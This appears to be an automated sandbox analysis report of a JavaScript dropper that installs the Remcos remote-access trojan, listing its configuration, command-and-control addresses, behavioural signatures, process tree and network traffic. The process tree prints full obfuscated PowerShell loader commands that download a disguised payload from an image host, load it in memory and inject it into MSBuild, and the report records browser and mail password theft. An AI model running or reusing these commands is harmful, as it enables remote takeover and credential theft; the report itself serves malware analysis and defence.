Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
15-12-2024 03:53
Static task
static1
Behavioral task
behavioral1
Sample
9b9059af739b167db6afce5129997e489dbb7baa3af27c8da5a68d564c2ed84e.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
9b9059af739b167db6afce5129997e489dbb7baa3af27c8da5a68d564c2ed84e.js
Resource
win10v2004-20241007-en
General
-
Target
9b9059af739b167db6afce5129997e489dbb7baa3af27c8da5a68d564c2ed84e.js
-
Size
4KB
-
MD5
9c23d2a7acc6acc81022dee56521c2ba
-
SHA1
40a93bafef8bfeec099f8f8f758336fe41a82a81
-
SHA256
9b9059af739b167db6afce5129997e489dbb7baa3af27c8da5a68d564c2ed84e
-
SHA512
193760ec2b498a40d2eb932314668aaf07c15d69b64ade12fe75e62d92a0a5ca34201f8f1c4a070b0e574e433fdf62fbe1785bbd2279f8e7fd58d2080df3aa88
-
SSDEEP
48:zto05EfkLolvMHs8Zcj6qHs9aCgUvZ5LbmnpFP:ztFqfkL+vhj6qHsl5Z5LyrP
Malware Config
Extracted
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20
Extracted
remcos
RemoteHost
160.25.73.25:6426
ruffella.duckdns.org:6426
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-QM0FWK
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/1108-52-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/3928-53-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/5112-55-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/3928-53-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/1108-52-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 5 IoCs
flow pid Process 4 2992 wscript.exe 9 2992 wscript.exe 12 2992 wscript.exe 19 4808 powershell.exe 26 4808 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2676 powershell.exe 4808 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation wscript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts MSBuild.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 4808 set thread context of 2432 4808 powershell.exe 90 PID 2432 set thread context of 1108 2432 MSBuild.exe 94 PID 2432 set thread context of 3928 2432 MSBuild.exe 95 PID 2432 set thread context of 5112 2432 MSBuild.exe 96 -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 2676 powershell.exe 2676 powershell.exe 4808 powershell.exe 4808 powershell.exe 1108 MSBuild.exe 1108 MSBuild.exe 5112 MSBuild.exe 5112 MSBuild.exe 1108 MSBuild.exe 1108 MSBuild.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 2432 MSBuild.exe 2432 MSBuild.exe 2432 MSBuild.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2676 powershell.exe Token: SeDebugPrivilege 4808 powershell.exe Token: SeDebugPrivilege 5112 MSBuild.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2432 MSBuild.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2992 wrote to memory of 888 2992 wscript.exe 82 PID 2992 wrote to memory of 888 2992 wscript.exe 82 PID 888 wrote to memory of 2676 888 wscript.exe 83 PID 888 wrote to memory of 2676 888 wscript.exe 83 PID 2676 wrote to memory of 4808 2676 powershell.exe 85 PID 2676 wrote to memory of 4808 2676 powershell.exe 85 PID 4808 wrote to memory of 2432 4808 powershell.exe 90 PID 4808 wrote to memory of 2432 4808 powershell.exe 90 PID 4808 wrote to memory of 2432 4808 powershell.exe 90 PID 4808 wrote to memory of 2432 4808 powershell.exe 90 PID 4808 wrote to memory of 2432 4808 powershell.exe 90 PID 4808 wrote to memory of 2432 4808 powershell.exe 90 PID 4808 wrote to memory of 2432 4808 powershell.exe 90 PID 4808 wrote to memory of 2432 4808 powershell.exe 90 PID 4808 wrote to memory of 2432 4808 powershell.exe 90 PID 4808 wrote to memory of 2432 4808 powershell.exe 90 PID 2432 wrote to memory of 1108 2432 MSBuild.exe 94 PID 2432 wrote to memory of 1108 2432 MSBuild.exe 94 PID 2432 wrote to memory of 1108 2432 MSBuild.exe 94 PID 2432 wrote to memory of 1108 2432 MSBuild.exe 94 PID 2432 wrote to memory of 3928 2432 MSBuild.exe 95 PID 2432 wrote to memory of 3928 2432 MSBuild.exe 95 PID 2432 wrote to memory of 3928 2432 MSBuild.exe 95 PID 2432 wrote to memory of 3928 2432 MSBuild.exe 95 PID 2432 wrote to memory of 5112 2432 MSBuild.exe 96 PID 2432 wrote to memory of 5112 2432 MSBuild.exe 96 PID 2432 wrote to memory of 5112 2432 MSBuild.exe 96 PID 2432 wrote to memory of 5112 2432 MSBuild.exe 96
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\9b9059af739b167db6afce5129997e489dbb7baa3af27c8da5a68d564c2ed84e.js1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\Temp\あ😒2⛑ぇ😯4♘オ😍4⛒く😾5.js2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:888 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGUAbQBvAHIAYQBuAGQAdQBtAHMAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJABjAG8AbgBlAG4AbwBzAGUAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQAgAD0AIAAkAGMAbwBuAGUAbgBvAHMAZQBzAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AZQBtAG8AcgBhAG4AZAB1AG0AcwApADsAJABlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQApADsAJAByAGUAcwBlAG4AdABpAHYAZQAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAbwB2AGUAcgBwAGEAYwBrACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHcAYQBsAGwAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAHMAZQBuAHQAaQB2AGUAKQA7ACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAbwB2AGUAcgBwAGEAYwBrACkAOwAkAHcAYQBsAGwAZQBkACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQBnAHQAIAAkAHcAYQBsAGwAZQBkADsAJAB3AGEAbABsAGUAZAAgACsAPQAgACQAcgBlAHMAZQBuAHQAaQB2AGUALgBMAGUAbgBnAHQAaAA7ACQAbABlAGcAYQB0AGkAbgBlACAAPQAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQAgACQAdwBhAGwAbABlAGQAOwAkAG0AZQB0AGUAbwByAGkAdABpAGMAIAA9ACAAJABlAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdwBhAGwAbABlAGQALAAgACQAbABlAGcAYQB0AGkAbgBlACkAOwAkAG8AcgBjAGEAcwAgAD0AIAAtAGoAbwBpAG4AIAAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAEwAZQBuAGcAdABoACkAXQA7ACQAcABlAHIAdgBhAHMAaQB2AGUAbgBlAHMAcwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbwByAGMAYQBzACkAOwAkAHMAeQBuAGkAegBlAHMAaQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAHAAZQByAHYAYQBzAGkAdgBlAG4AZQBzAHMAZQBzACkAOwAkAHYAdQBsAGMAYQBuAGkAcwBtAHMAIAA9ACAAWwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApADsAJAB2AHUAbABjAGEAbgBpAHMAbQBzAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAEAAKAAnADAALwB0AEIAYwBEAGkALwByAC8AZQBlAC4AZQB0AHMAYQBwAC8ALwA6AHMAcAB0AHQAaAAnACwAIAAnAGMAbwBuAHMAdABhAG4AdABhAG4AJwAsACAAJwBjAG8AbgBzAHQAYQBuAHQAYQBuACcALAAgACcAYwBvAG4AcwB0AGEAbgB0AGEAbgAnACwAIAAnAE0AUwBCAHUAaQBsAGQAJwAsACAAJwBjAG8AbgBzAHQAYQBuAHQAYQBuACcALAAgACcAYwBvAG4AcwB0AGEAbgB0AGEAbgAnACwAJwBjAG8AbgBzAHQAYQBuAHQAYQBuACcALAAnAGMAbwBuAHMAdABhAG4AdABhAG4AJwAsACcAYwBvAG4AcwB0AGEAbgB0AGEAbgAnACwAJwBjAG8AbgBzAHQAYQBuAHQAYQBuACcALAAnAGMAbwBuAHMAdABhAG4AdABhAG4AJwAsACcAMQAnACwAJwBjAG8AbgBzAHQAYQBuAHQAYQBuACcAKQApADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsA';$asphyxiation = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($forsakers));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $asphyxiation3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::FromBase64String($orcas);$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);$vulcanisms = [dnlib.IO.Home].GetMethod('VAI');$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4808 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\Admin\AppData\Local\Temp\kqelxapnqggqyolidygkpeurtbxorgmui"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1108
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\Admin\AppData\Local\Temp\mtkvy"6⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:3928
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\Admin\AppData\Local\Temp\wnpozllis"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5112
-
-
-
-
-
Network
-
Remote address:8.8.8.8:53Requestres.cloudinary.comIN AResponseres.cloudinary.comIN CNAMEresc.cloudinary.com.cdn.cloudflare.netresc.cloudinary.com.cdn.cloudflare.netIN A104.17.202.1resc.cloudinary.com.cdn.cloudflare.netIN A104.17.201.1
-
Remote address:104.17.202.1:443RequestGET /dzakc3wag/raw/upload/v1734112417/uploaded_textfile HTTP/1.1
Accept: */*
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: res.cloudinary.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 157299
Connection: keep-alive
CF-Ray: 8f237ca83bc67723-LHR
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, immutable, max-age=2592000
Content-Disposition: attachment; filename="uploaded_textfile"
ETag: "e39538cf60c1a9768333bf00e0262702"
Last-Modified: Fri, 13 Dec 2024 17:53:38 GMT
Strict-Transport-Security: max-age=604800
Vary: Accept-Encoding
access-control-expose-headers: Content-Length,Content-Disposition,ETag,Server-Timing,Vary
server-timing: cld-cloudflare;dur=22;start=2024-12-15T03:53:29.649Z;desc=hit,rtt;dur=48
timing-allow-origin: *
x-request-id: 09309909e85cdcf78096ba77219125ea
Server: cloudflare
-
Remote address:8.8.8.8:53Request8.8.8.8.in-addr.arpaIN PTRResponse8.8.8.8.in-addr.arpaIN PTRdnsgoogle
-
Remote address:8.8.8.8:53Request133.211.185.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request1.202.17.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.214.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request22.249.124.192.in-addr.arpaIN PTRResponse22.249.124.192.in-addr.arpaIN PTRcloudproxy10022sucurinet
-
GEThttps://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgpowershell.exeRemote address:104.17.202.1:443RequestGET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1
Host: res.cloudinary.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: image/jpeg
Content-Length: 2230233
Connection: keep-alive
CF-Ray: 8f237caf8b6194e4-LHR
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, immutable, max-age=2592000
ETag: "7b9a6708dc7c92995f443d0b41dbc8d0"
Last-Modified: Mon, 02 Dec 2024 10:22:29 GMT
Strict-Transport-Security: max-age=604800
Vary: Accept-Encoding
access-control-expose-headers: Content-Length,ETag,Server-Timing,Vary,x-content-type-options
server-timing: cld-cloudflare;dur=18;start=2024-12-15T03:53:30.814Z;desc=hit,rtt;dur=51,content-info;desc="width=1920,height=1080,bytes=2230233,o=1,ef=(17);"
timing-allow-origin: *
x-content-type-options: nosniff
x-request-id: 6f487a4c60d72621f2efeecff85ca20a
Server: cloudflare
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request209.205.72.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestpaste.eeIN AResponsepaste.eeIN A104.21.84.67paste.eeIN A172.67.187.200
-
Remote address:104.21.84.67:443RequestGET /r/iDcBt/0 HTTP/1.1
Host: paste.ee
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=2592000
strict-transport-security: max-age=63072000
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
CF-Cache-Status: HIT
Age: 95197
Last-Modified: Sat, 14 Dec 2024 01:27:02 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eyDw1lfxvGQqa7XOJ9xLShoZgADYc%2FWs9Jmp05m7wLnp009iaRQD0AecYvtpk9OP6LGN9shcsDG7NZEo%2FAfLBcQ1CXFGwmAlOVxd%2BY1VdI35Ys1o%2B0AOPB7q3A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f237ce5aa479521-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=48695&min_rtt=47202&rtt_var=12530&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2977&recv_bytes=359&delivery_rate=76452&cwnd=253&unsent_bytes=0&cid=f144c36d67ed71dc&ts=126&x=0"
-
Remote address:8.8.8.8:53Request67.84.21.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request25.73.25.160.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestgeoplugin.netIN AResponsegeoplugin.netIN A178.237.33.50
-
Remote address:178.237.33.50:80RequestGET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
server: Apache
content-length: 956
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
-
Remote address:8.8.8.8:53Request50.33.237.178.in-addr.arpaIN PTRResponse50.33.237.178.in-addr.arpaIN CNAME50.32/27.178.237.178.in-addr.arpa
-
Remote address:8.8.8.8:53Request56.163.245.4.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request241.42.69.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.210.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request77.190.18.2.in-addr.arpaIN PTRResponse77.190.18.2.in-addr.arpaIN PTRa2-18-190-77deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request14.227.111.52.in-addr.arpaIN PTRResponse
-
104.17.202.1:443https://res.cloudinary.com/dzakc3wag/raw/upload/v1734112417/uploaded_textfiletls, httpwscript.exe7.0kB 171.2kB 138 134
HTTP Request
GET https://res.cloudinary.com/dzakc3wag/raw/upload/v1734112417/uploaded_textfileHTTP Response
200 -
104.17.202.1:443https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgtls, httppowershell.exe68.1kB 2.3MB 1183 1664
HTTP Request
GET https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgHTTP Response
200 -
12.1kB 685.4kB 255 502
HTTP Request
GET https://paste.ee/r/iDcBt/0HTTP Response
200 -
3.4kB 1.7kB 14 17
-
35.1kB 513.0kB 222 401
-
623 B 1.3kB 12 3
HTTP Request
GET http://geoplugin.net/json.gpHTTP Response
200
-
64 B 148 B 1 1
DNS Request
res.cloudinary.com
DNS Response
104.17.202.1104.17.201.1
-
66 B 90 B 1 1
DNS Request
8.8.8.8.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
133.211.185.52.in-addr.arpa
-
71 B 133 B 1 1
DNS Request
1.202.17.104.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.214.232.199.in-addr.arpa
-
73 B 113 B 1 1
DNS Request
22.249.124.192.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
209.205.72.20.in-addr.arpa
-
54 B 86 B 1 1
DNS Request
paste.ee
DNS Response
104.21.84.67172.67.187.200
-
71 B 133 B 1 1
DNS Request
67.84.21.104.in-addr.arpa
-
71 B 125 B 1 1
DNS Request
25.73.25.160.in-addr.arpa
-
59 B 75 B 1 1
DNS Request
geoplugin.net
DNS Response
178.237.33.50
-
72 B 155 B 1 1
DNS Request
50.33.237.178.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
56.163.245.4.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
241.42.69.40.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.210.232.199.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
77.190.18.2.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
14.227.111.52.in-addr.arpa
-
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD5510a364823ec4188609f8e311a1bdf7e
SHA110fcb9899987d677aa0b741dcbae83597c1ea3a9
SHA25678db8e93bf7a68477bd6ba07c0b6f72cd16f23f42770ead0f31e4c26326abcd5
SHA5129ff6c3331ccafc64871380b826f4c21ab865f7f8eafbad4109e2f99a04a872c2770a342174a730befb26324761ed0f067adfd2e9e8a9d6718e7027dc7dc8b102
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
